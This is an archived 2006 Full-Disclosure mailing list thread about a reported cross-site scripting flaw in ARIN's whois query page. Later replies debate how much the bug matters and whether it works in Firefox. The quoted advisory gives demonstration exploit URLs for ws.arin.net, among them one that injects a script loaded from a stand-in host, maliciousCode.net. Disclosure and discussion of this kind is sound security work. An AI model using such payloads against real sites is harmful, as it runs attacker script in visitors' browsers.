[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Fri Mar 3 21:29:02 2006
From: steven at lovebug.org (Steven)
Subject: Arin.net XSS
It works in IE just fine and probably some other browsers.
Firefox does a few things:
1) It takes the liberty of converting "<" to %3C
2) Leaves %3C as %3C and does not convert into "<"
This prevents the script from being interpreted (in)properly via the Address
bar.
Steven
----- Original Message -----
From: "Simon Smith" <simon@...soft.com>
To: "Steven" <steven@...ebug.org>
Cc: "Terminal Entry" <Security@...dro.net>; "Full Disclosure"
<full-disclosure@...ts.grok.org.uk>; "Bug Traq" <bugtraq@...urityfocus.com>
Sent: Friday, March 03, 2006 4:09 PM
Subject: Re: [Full-disclosure] Arin.net XSS
> Right,
> Did this ever work? This fails for me man. How did you verify it?
>
> Steven wrote:
>> ok?
>>
>> So what exactly are you going to exploit here? This site doesn't have
>> any logins or even use cookies. Are you going to trick a user into
>> entering in a credit card number before they can search the whois
>> database?
>>
>> I think that XSS in many instances is a serious issues. Many of the XSS
>> issues reported on FD are rarely of much consequence but could
>> theoretically lead to a sessions hijack or tricking the user into a fake
>> login screen. However, in this instance I fail to see what the point
>> could possible be? If it is that you can simply run javascript then so
>> what? Close to 100% of any webhosting provider on the internet will let
>> you upload your own javascript. Might as well report that geocities.com
>> is vulnerable to XSS because you could upload an html file with
>> javascript on it.
>>
>> Anyway.. that's my take on this. Feel free to correct me.. I don't mind.
>>
>> Steven
>>
>> ----- Original Message -----
>> From: Terminal Entry
>> To: Full Disclosure ; Bug Traq
>> Sent: Thursday, March 02, 2006 11:17 PM
>> Subject: [Full-disclosure] Arin.net XSS
>>
>>
>> Title
>> ARIN.NET input validation holes in "?queryinput=" allows remote users
>> conduct cross-site scripting attacks
>>
>> Notification
>> Multiple attempts to contact Arin site administrators went unanswered
>>
>> Exploit Included: Yes
>>
>> Description
>> The "?queryinput=" script does not properly validate user-supplied
>> input in several parameters to filter HTML code. A remote user can create
>> a specially crafted URL that, when loaded by a target user, will cause
>> arbitrary scripting code to be executed by the target user's browser.
>>
>> Some demonstration exploit URLs are provided:
>>
>> http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
>>
>> http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E
>>
>> http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
>>
>> Discovered by Terminal Entry security [.at.] peadro (.)net
>>
>>
>>
>>
>> ------------------------------------------------------------------------------
>> This email and any files transmitted with it are confidential and
>> intended solely for the use of the individual or entity to whom they are
>> addressed. If you have received this email in error please notify the
>> system manager. This message contains confidential information and is
>> intended only for the individual named. If you are not the named
>> addressee you should not disseminate, distribute or copy this e-mail.
>> Please notify the sender immediately by e-mail if you have received this
>> e-mail by mistake and delete this e-mail from your system. If you are not
>> the intended recipient you are notified that disclosing, copying,
>> distributing or taking any action in reliance on the contents of this
>> information is strictly prohibited.
>>
>>
>>
>> ------------------------------------------------------------------------------
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>> ------------------------------------------------------------------------
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> --
>
>
> Regards,
> Adriel T. Desautels
> Harvard Security Group
> http://www.harvardsecuritygroup.com
>
>
Powered by blists - more mailing lists